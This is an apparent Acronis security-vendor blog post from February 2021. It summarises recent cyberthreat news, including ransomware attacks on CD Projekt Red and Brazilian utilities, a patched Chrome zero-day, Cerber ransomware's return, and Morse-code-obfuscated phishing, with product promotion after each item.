Cyberthreat update from Acronis CPOCs: Week of February 15, 2021

Here at Acronis, we’re always monitoring for dangers to your data, deploying updates to handle newly-discovered vulnerabilities, and issuing alerts and recommendations to help you stay protected. Our global network of Acronis Cyber Protection Operations Centers (CPOCs) continue to work around the clock to proactively detect and defend against the latest cyberthreats.

Part of this work includes video updates to inform you of modern hazards in the digital landscape — such as ransomware strikes on major companies and new techniques seen in phishing campaigns. Here’s a look at some of the most recent breaking news and analyses:

Cyberpunk 2077 developer falls victim to ransomware attack

CD Projekt Red, the studio behind hit games like Cyberpunk 2077 and The Witcher 3: Wild Hunt, has disclosed that they’ve suffered a ransomware attack. The company’s devices were encrypted and data — including source code for their games — was exfiltrated.

The Poland-based studio has over 1,000 employees, and even after a recent drop in value due to circumstances around their latest release, CD Projekt Red is still worth over $1 billion. This makes them a tempting target for cybercriminals, who aim to maximize their profits by going after companies that can afford to pay large ransoms.

Little information about the attack is publicly known, though researchers speculate based on leaked screenshots that the HelloKitty ransomware gang is responsible. The leaked source code has already been put up for auction on the dark web, with a starting price of $1 million.

With its AI-powered behavioral heuristic engine, Acronis Cyber Protect detects malicious patterns to stop both known and unknown ransomware variants in their tracks.

Patch issued for critical zero-day Chrome vulnerability

Google recently released a patch for the zero-day vulnerability CVE-2021-21148, a heap overflow memory corruption in the V8 JavaScript engine of the Chrome browser. This vulnerability has already been exploited in the wild.

CVE-2021-21148 could potentially allow a malicious website to execute arbitrary code on the victim’s computer. There have already been several critical browser flaws discovered in 2021 — Apple patched multiple zero-day vulnerabilities in the WebKit browser engine last month, while a South Korean security company reported a new Internet Explorer issue last week.

This issue has been fixed as of Chrome version 88.0.4324.150, though of course users are not protected until they’ve updated the browser client on their own system. The patch management capabilities in Acronis Cyber Protect automatically detect and retrieve new releases of critical third-party applications, while automated backups ensure the option for a quick rollback if any stability or incompatibility issues should arise.

Cybercriminals attack Brazilian utility companies, steal over 1,000 GB of data

Two state-owned Brazilian power utility companies were recently hit by ransomware in separate attacks.

Centrais Eletricas Brasileiras (Eletrobras), the largest power utility company in Latin America with over $12 billion in annual revenue, was targeted by an undisclosed ransomware group. The attackers managed to compromise the administrative network of the company’s nuclear power subsidiary, Eletronuclear. The operational network that manages nuclear plants was not accessed.

Companhia Paranaense de Energia (Copel) suffered a ransomware attack by Darkside. The attackers stole over 1,000 GB of sensitive data, including an active directory database with hashed passwords that cybercriminals can use in follow-up attacks.

Ransomware, especially that which exfiltrates data, is a dominant and rapidly-evolving cyberthreat. Acronis Cyber Protect defends against any ransomware threat — new or old — with its behavioral heuristic engine to prevent damage to your network and loss of data.

Cerber ransomware returns after years of silence

Cerber was once the most prevalent ransomware family, a ransomware-as-a-service (RaaS) offering that at one point accounted for as much as 90% of all ransomware attacks on Windows-based systems. But by 2018, Cerber had seemingly disappeared from the cyberthreat landscape.

As of last year, Cerber appears to be back with a vengeance. Analysis of 239 million cyberattacks shows that Cerber was responsible for 58% of all ransomware attacks on the healthcare sector in 2020.

Cerber is distributed by phishing emails and malicious websites, which are techniques that have proven to be highly effective in getting victims to install malware on their systems, often under the guise of being an update to previously-installed software. The multi-layered approach to cyber protection in Acronis Cyber Protect stops malware from executing before it can compromise your data, while URL filtering also blocks access to the malicious websites that host Cerber and other ransomware, preventing their download and installation from the start.

Morse code used to hide malicious URLs in phishing attacks

Many phishing attacks use some form of obfuscation to hide their code and malicious intent. Researchers recently discovered attackers using Morse code for that very purpose.

Attackers are side-stepping some cybersecurity solutions by using Morse code to disguise and hide malicious domains within an email. When accessed, these domains load scripts that render a fake sign-in page for Microsoft Office, prompting the victim to enter their user credentials. These usernames and passwords, of course, are simply captured by the cybercriminals.

Research has shown that as recently as 2020, 97% of users are unable to reliably tell the difference between a legitimate email and a well-crafted spear phishing email. Successful spear phishing attacks now cost companies an average of $1.6 million. The URL filtering capabilities in Acronis Cyber Protect can stop malware downloads and code execution by blocking malicious domains entirely.

# # #

For the latest reports on emerging cyberthreats from Acronis’ cyber protection experts, subscribe to the Acronis YouTube channel and receive our CPOC updates as they’re posted.